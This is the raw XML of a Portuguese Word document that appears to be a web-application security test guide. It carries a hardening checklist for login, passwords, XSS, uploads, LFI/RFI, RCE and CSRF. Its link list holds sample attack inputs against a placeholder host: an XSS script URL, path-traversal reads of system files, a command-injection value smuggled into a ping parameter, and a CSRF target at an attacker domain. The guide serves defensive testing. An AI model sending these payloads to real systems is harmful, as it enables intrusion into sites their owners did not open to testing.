        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240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Esperado seguro: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tokens anti-CSRF por requisição, SameSite cookies, checagem de origem/referer.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="69E3FBEF" wp14:textId="6A094E46"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="5A02A4D0" wp14:textId="01626729">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322" w:afterAutospacing="off"/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Dicas de validação e hardening (checklist rápido)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="64B3E134" wp14:textId="1799FAA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Mensagens de erro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>: genéricas; logs detalhados só no servidor.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="648A1417" wp14:textId="33B124E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Login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>: lockout temporário, captcha progressivo, resposta e timing constantes.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="28012038" wp14:textId="31040BD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Senhas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>: mínimo 12+ chars, blacklist de senhas comuns, zxcvbn (no frontend) + validação no backend.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="1CAC6007" wp14:textId="3075142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Cripto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use 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argon2id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(ou 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bcrypt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custo alto), sal único por usuário; </w:t>
      </w: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nunca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plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="16E37A91" wp14:textId="643DE6E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XSS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>: escape por contexto, CSP estrita, desabilitar inline, sanitização de HTML.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="3AC72534" wp14:textId="3E767FB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Upload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validação </w:t>
      </w:r>
      <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D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server-side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>, renomear, varrer, armazenar fora do webroot.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="68BE5580" wp14:textId="73F026D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LFI/RFI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>: usar IDs ao invés de paths, permitir apenas templates pré-mapeados.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="4B74EC94" wp14:textId="18678CD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RCE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>: jamais concatenar strings em comandos; preferir libs que não shellam; whitelists.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3DE1C3A3" wp14:paraId="1C2EAE70" wp14:textId="2456F89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E1C3A3" w:rsidR="0755C3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CSRF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tokens + SameSite=Lax/Strict; para APIs, usar </w:t>
      </w:r>
      <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Authorization</w:t>
      </w:r>
      <w:r w:rsidRPr="3DE1C3A3" w:rsidR="0755C3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(bearer) e CORS correto.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="1E207724" wp14:textId="0190714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0bb26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7c1a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d755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9C7F4D"/>
    <w:rsid w:val="039C7F4D"/>
    <w:rsid w:val="0755C3D7"/>
    <w:rsid w:val="227CA51A"/>
    <w:rsid w:val="3DE1C3A3"/>
    <w:rsid w:val="72246EE8"/>
    <w:rsid w:val="738250C9"/>
    <w:rsid w:val="7DB68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7F4D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E2884E1B-8F5A-4759-AB97-2DD0E6604B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DE1C3A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3DE1C3A3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3DE1C3A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3DE1C3A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3DE1C3A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ASE_URL/api/register" TargetMode="External" Id="Ra165f71b36374103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://BASE_URL/api/register" TargetMode="External" Id="R0883eeb9b7ee4b7c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://BASE_URL/api/items" TargetMode="External" Id="Rb0d19ad5e74f4664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://BASE_URL/api/login" TargetMode="External" Id="R2d5e3187a70945e5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://BASE_URL/search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E" TargetMode="External" Id="R5a5c8cfbec42477b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://BASE_URL/api/comments" TargetMode="External" Id="R6667d1451e724f96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://BASE_URL/items?id=1" TargetMode="External" Id="R7dfdb7dae33c4ab6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://BASE_URL/items?id=1" TargetMode="External" Id="R902b50e664b843ba" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://BASE_URL/items?id=1" TargetMode="External" Id="Rb267a6b05faa4317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://BASE_URL/upload" TargetMode="External" Id="R0746bca50cfc4fcf" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:file=@teste.txt" TargetMode="External" Id="Rb52ba6495e624fd0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://BASE_URL/upload" TargetMode="External" Id="R21dac1d9d6d3448d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://BASE_URL/view?template=../../../../etc/hostname" TargetMode="External" Id="Ra4803850989c461d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://BASE_URL/view?template=..\..\..\Windows\win.ini" TargetMode="External" Id="R02a783aa25104b4f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://BASE_URL/ping?host=127.0.0.1;echo" TargetMode="External" Id="R688c371ed6684734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:value=&quot;csrf@attacker.local" TargetMode="External" Id="R68eeea7415514397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="R1ca125e94f3a48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2025-08-20T12:12:04.8188723Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-20T12:15:40.0632646Z</dcterms:modified>
  <dc:creator>Henrique Heruster de Carvalho</dc:creator>
  <lastModifiedBy>Henrique Heruster de Carvalho</lastModifiedBy>
</coreProperties>
</file>